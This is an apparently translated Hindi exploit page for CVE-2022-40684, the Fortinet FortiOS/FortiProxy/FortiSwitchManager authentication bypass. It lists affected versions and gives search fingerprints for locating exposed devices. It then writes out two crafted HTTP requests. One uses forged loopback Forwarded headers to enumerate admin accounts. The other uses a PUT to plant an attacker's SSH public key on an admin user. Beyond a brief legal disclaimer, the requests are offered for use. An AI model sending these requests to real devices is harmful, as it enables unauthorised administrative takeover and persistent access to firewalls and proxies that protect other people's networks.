
CVE-2022-40684 के लिए PoC और शोषण, Fortinet FortiOS, FortiProxy और FortiSwitchManager प्रबंधन इंटरफेस में एक प्रमाणीकरण बाईपास, जो तैयार HTTP अनुरोधों के माध्यम से अनधिकृत व्यवस्थापक पहुंच को सक्षम करता है।
किसी भी व्यक्ति या संगठन को इंटरनेट का उपयोग करते समय संवैधानिक कानूनों का पालन करना चाहिए, सार्वजनिक व्यवस्था का पालन करना चाहिए, सामाजिक नैतिकता का सम्मान करना चाहिए, नेटवर्क सुरक्षा को नुकसान नहीं पहुँचाना चाहिए, और राष्ट्रीय सुरक्षा, सम्मान और हितों को नुकसान पहुँचाने वाली गतिविधियों के लिए इंटरनेट का उपयोग नहीं करना चाहिए।
Fortinet एक वैश्विक स्तर पर प्रसिद्ध नेटवर्क सुरक्षा उत्पाद और सुरक्षा समाधान प्रदाता है, जिसके उत्पादों में फ़ायरवॉल, एंटीवायरस सॉफ़्टवेयर, आक्रमण रोकथाम प्रणाली और एंडपॉइंट सुरक्षा घटक शामिल हैं। प्रभावित FortiOS, FortiProxy और FortiSwitchManager उत्पादों के प्रबंधन इंटरफ़ेस में, वैकल्पिक पथ या चैनलों का उपयोग करके प्रमाणीकरण को दरकिनार किया जा सकता है, और बिना प्रमाणीकरण के विशेष रूप से तैयार HTTP या HTTPS अनुरोधों के माध्यम से प्रबंधन इंटरफ़ेस पर संचालन किया जा सकता है।
FortiOS संस्करण 7.2.0 - 7.2.1
FortiOS संस्करण 7.0.0 - 7.0.6
FortiProxy संस्करण 7.2.0
FortiProxy संस्करण 7.0.0 - 7.0.6
FortiSwitchManager संस्करण 7.2.0
FortiSwitchManager संस्करण 7.0.0
title="FortiProxy“
title="FortiGate"

GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json
{"ssh-public-key1": "\"公钥内容\""}

